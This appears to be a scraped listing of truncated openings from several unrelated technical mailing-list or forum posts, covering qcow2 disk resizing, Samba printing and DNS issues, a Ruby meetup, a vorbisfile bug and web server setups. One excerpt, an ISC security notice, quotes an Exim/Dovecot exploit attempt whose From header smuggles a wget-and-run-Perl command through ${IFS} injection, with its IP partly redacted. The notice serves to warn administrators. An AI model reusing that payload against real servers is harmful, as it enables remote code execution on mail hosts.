Re-sizing qcow2 images
Hello All, I am using Centos 6.3 with libvirt 0.910 and qemu-kvm 0.12 I had to resize a qcow2 disk, and came across several issues; I used this command to resize the image: sudo -i /usr/bin/qemu-img /var/lib/libvirt/images/mydisk.img resize +100G . The disk is attached using virtio. I then tried to use parted from within the guest to resize the partition. The first problem was that the

FTP server down?
Not sure if this is the right place to mention it, but ..... The server downloads.asterisk.org was refusing FTP connections last night, and still does not seem to be accepting them this morning. FTP may not be "modern" or "trendy", but the ability to navigate around folders textually is nonetheless extremely handy when using a machine with no X server, from its own

Unstable printing w/3.2.0
I've upgraded my print server to CentOS5 w/Samba 3.2.0. While it "works" we are experiencing numerous irritating issues. I'm curious if anyone else is experencing these issues. 1.) Print jobs do not clear out of the CIFS queue. So we now have printers that show they have over 1,000 jobs in the queue although the queue is empty. This is a bug scheduled to be fixed in 3.2.1

from ISC: Exim/Dovecot exploit making the rounds
One of our readers wrote in to let us know that he had received an attempted Exim/Dovecot exploit attempt against his email server. The exploit partially looked like this: From: x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@blaat.com (Obviously edited for your safety, and I didn't post the whole thing.) This is an exploit against Dovecot that is using

S4 AD Domain Up; but no DNS auto-registration
samba-4.0.0 x86_64, CentOS6.3 My Samba4 / AD is up and running after migrating this weekend. Testing looked good and the domain *is working* but there are some issues. Automatic DNS update is not working. Workstations seem to be registering their names but joining a server to the domain works but fails with a error - and the DNS record is *not* added. SF Beer & Pizza SIG - review and forecast
Wednesday''s Beer & Pizza SIG was attended by about a dozen Rubyists, plus one extremely well-dressed gentleman (no hacker he!) who was on the prowl for Rubyists to hire. Beer and Pizza (among other things) were consumed, Ruby (among other things) was discussed, and everyone appeared to have a good time. The upcoming SIG will, as announced previously, be held just up the street at

vorbisfile weirdness
Hi! I'm trying to write a vorbis plugin for my MP3/Music/Media player (http://elmp-tng.sourceforge.net). I'm using vorbisfile, and ov_open_callbacks() (to interface with my VFS layer). The problem is the same using plain ov_open() though... Some files play perfectly, while others (most) fail. ov_open returns OV_EBADHEADER. The really strange thing is that both ogg123, and the simple test

Opinion on different web server setups?
This is not directly a Rails question but you lot seem the best to ask... I have a strong feeling we will be developing future apps in Rails (Ruby fans are slowly starting to outnumber cynics in my office) so I want a web server plan that will be appropriate for that. We have just bought two new web servers I want to turn into a load-balanced, redundant pair. As well as any Rails
